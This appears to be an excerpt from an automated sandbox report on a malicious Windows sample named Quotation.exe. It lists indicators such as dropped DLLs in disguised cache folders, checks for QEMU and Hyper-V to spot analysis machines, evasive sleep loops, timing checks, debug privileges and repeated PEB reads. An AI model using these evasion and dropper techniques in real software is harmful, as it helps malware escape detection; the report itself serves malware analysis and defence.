Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335308CD push ecx; mov dword ptr [esp], ecx 10_2_335308D6
PE file contains sections with non-standard names
Source: maintenanceservice2.exe.1.dr Static PE information: section name: .00cfg
Source: percentile.dll.1.dr Static PE information: section name: .xdata
Source: percentile.dll.1.dr Static PE information: section name: /4
Source: percentile.dll.1.dr Static PE information: section name: /19
Source: percentile.dll.1.dr Static PE information: section name: /31
Source: percentile.dll.1.dr Static PE information: section name: /45
Source: percentile.dll.1.dr Static PE information: section name: /57
Source: percentile.dll.1.dr Static PE information: section name: /70
Source: percentile.dll.1.dr Static PE information: section name: /81
Source: percentile.dll.1.dr Static PE information: section name: /92
Source: libdatrie-1.dll.1.dr Static PE information: section name: .xdata
Source: libpkcs11-helper-1.dll.1.dr Static PE information: section name: .xdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_6D261A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 1_2_6D261A98
Binary contains a suspicious time stamp
Source: System.Security.Cryptography.X509Certificates.dll.1.dr Static PE information: 0xF15766E0 [Tue Apr 22 20:30:24 2098 UTC]
Drops PE files
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Temp\nsi3181.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exe Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6924 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6272 Thread sleep count: 103 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6272 Thread sleep time: -206000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Quotation.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dll Jump to dropped file
Source: C:\Users\user\Desktop\Quotation.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exe Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33571763 rdtsc 10_2_33571763
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 878 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 877 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Quotation.exe API coverage: 1.3 %
Source: C:\Windows\SysWOW64\control.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_004062DD FindFirstFileA,FindClose, 1_2_004062DD
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose, 1_2_004057A2
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_00402765 FindFirstFileA, 1_2_00402765
Source: C:\Users\user\Desktop\Quotation.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Quotation.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData\Local\Microsoft Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache Jump to behavior
Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 0000000C.00000003.23162953109.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:\z1
Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22206133990.0000000003226000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23174182850.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23184882295.0000000010332000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26443929724.0000000010332000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_6D261A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 1_2_6D261A98
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33571763 rdtsc 10_2_33571763
Enables debug privileges
Source: C:\Users\user\Desktop\Quotation.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356A350 mov eax, dword ptr fs:[00000030h] 10_2_3356A350
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33528347 mov eax, dword ptr fs:[00000030h] 10_2_33528347
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33528347 mov eax, dword ptr fs:[00000030h] 10_2_33528347
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33528347 mov eax, dword ptr fs:[00000030h] 10_2_33528347
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h] 10_2_335AE372
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h] 10_2_335AE372
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h] 10_2_335AE372
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h] 10_2_335AE372
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B0371 mov eax, dword ptr fs:[00000030h] 10_2_335B0371
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B0371 mov eax, dword ptr fs:[00000030h] 10_2_335B0371
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355237A mov eax, dword ptr fs:[00000030h] 10_2_3355237A
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h] 10_2_3353B360
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h] 10_2_3353B360
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h] 10_2_3353B360
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h] 10_2_3353B360
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h] 10_2_3353B360
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h] 10_2_3353B360
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h] 10_2_3356E363
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h] 10_2_3356E363
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h] 10_2_3356E363
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h] 10_2_3356E363
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h] 10_2_3356E363
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h] 10_2_3356E363
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h] 10_2_3356E363
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h] 10_2_3356E363
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h] 10_2_3354E310
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h] 10_2_3354E310
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h] 10_2_3354E310
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356631F mov eax, dword ptr fs:[00000030h] 10_2_3356631F
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33529303 mov eax, dword ptr fs:[00000030h] 10_2_33529303
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33529303 mov eax, dword ptr fs:[00000030h] 10_2_33529303
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335EF30A mov eax, dword ptr fs:[00000030h] 10_2_335EF30A
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33603336 mov eax, dword ptr fs:[00000030h] 10_2_33603336
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B330C mov eax, dword ptr fs:[00000030h] 10_2_335B330C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B330C mov eax, dword ptr fs:[00000030h] 10_2_335B330C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B330C mov eax, dword ptr fs:[00000030h] 10_2_335B330C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B330C mov eax, dword ptr fs:[00000030h] 10_2_335B330C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33568322 mov eax, dword ptr fs:[00000030h] 10_2_33568322
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33568322 mov eax, dword ptr fs:[00000030h] 10_2_33568322
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33568322 mov eax, dword ptr fs:[00000030h] 10_2_33568322
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355332D mov eax, dword ptr fs:[00000030h] 10_2_3355332D
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h] 10_2_3352E328
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h] 10_2_3352E328
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h] 10_2_3352E328
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335633D0 mov eax, dword ptr fs:[00000030h] 10_2_335633D0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335643D0 mov ecx, dword ptr fs:[00000030h] 10_2_335643D0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B43D5 mov eax, dword ptr fs:[00000030h] 10_2_335B43D5
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h] 10_2_3352E3C0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h] 10_2_3352E3C0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h] 10_2_3352E3C0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352C3C7 mov eax, dword ptr fs:[00000030h] 10_2_3352C3C7
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335363CB mov eax, dword ptr fs:[00000030h] 10_2_335363CB
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h] 10_2_3355A390
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h] 10_2_3355A390
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h] 10_2_3355A390
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h] 10_2_33531380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h] 10_2_33531380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h] 10_2_33531380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h] 10_2_33531380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h] 10_2_33531380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h] 10_2_3354F380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h] 10_2_3354F380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h] 10_2_3354F380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h] 10_2_3354F380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h] 10_2_3354F380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h] 10_2_3354F380
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335EF38A mov eax, dword ptr fs:[00000030h] 10_2_335EF38A
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335AC3B0 mov eax, dword ptr fs:[00000030h] 10_2_335AC3B0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335393A6 mov eax, dword ptr fs:[00000030h] 10_2_335393A6
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335393A6 mov eax, dword ptr fs:[00000030h] 10_2_335393A6
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F124C mov eax, dword ptr fs:[00000030h] 10_2_335F124C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F124C mov eax, dword ptr fs:[00000030h] 10_2_335F124C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F124C mov eax, dword ptr fs:[00000030h] 10_2_335F124C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335F124C mov eax, dword ptr fs:[00000030h] 10_2_335F124C
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335EF247 mov eax, dword ptr fs:[00000030h] 10_2_335EF247
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3355F24A mov eax, dword ptr fs:[00000030h] 10_2_3355F24A
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h] 10_2_3352B273
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h] 10_2_3352B273
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h] 10_2_3352B273
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h] 10_2_335C327E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h] 10_2_335C327E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h] 10_2_335C327E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h] 10_2_335C327E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h] 10_2_335C327E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h] 10_2_335C327E
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335ED270 mov eax, dword ptr fs:[00000030h] 10_2_335ED270
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352821B mov eax, dword ptr fs:[00000030h] 10_2_3352821B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335BB214 mov eax, dword ptr fs:[00000030h] 10_2_335BB214
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335BB214 mov eax, dword ptr fs:[00000030h] 10_2_335BB214
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352A200 mov eax, dword ptr fs:[00000030h] 10_2_3352A200
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33550230 mov ecx, dword ptr fs:[00000030h] 10_2_33550230
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h] 10_2_335B0227
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h] 10_2_335B0227
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h] 10_2_335B0227
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h] 10_2_3356A22B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h] 10_2_3356A22B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h] 10_2_3356A22B
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335532C5 mov eax, dword ptr fs:[00000030h] 10_2_335532C5
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_336032C9 mov eax, dword ptr fs:[00000030h] 10_2_336032C9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h] 10_2_335402F9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h] 10_2_335402F9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h] 10_2_335402F9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h] 10_2_335402F9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h] 10_2_335402F9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h] 10_2_335402F9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h] 10_2_335402F9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h] 10_2_335402F9
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335272E0 mov eax, dword ptr fs:[00000030h] 10_2_335272E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h] 10_2_3353A2E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h] 10_2_3353A2E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h] 10_2_3353A2E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h] 10_2_3353A2E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h] 10_2_3353A2E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h] 10_2_3353A2E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h] 10_2_335382E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h] 10_2_335382E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h] 10_2_335382E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h] 10_2_335382E0
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352D2EC mov eax, dword ptr fs:[00000030h] 10_2_3352D2EC
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3352D2EC mov eax, dword ptr fs:[00000030h] 10_2_3352D2EC
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33537290 mov eax, dword ptr fs:[00000030h] 10_2_33537290
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33537290 mov eax, dword ptr fs:[00000030h] 10_2_33537290
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_33537290 mov eax, dword ptr fs:[00000030h] 10_2_33537290
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_335AE289 mov eax, dword ptr fs:[00000030h] 10_2_335AE289
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h] 10_2_3360B2BC
Source: C:\Users\user\Desktop\Quotation.exe Code function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h] 10_2_3360B2BC
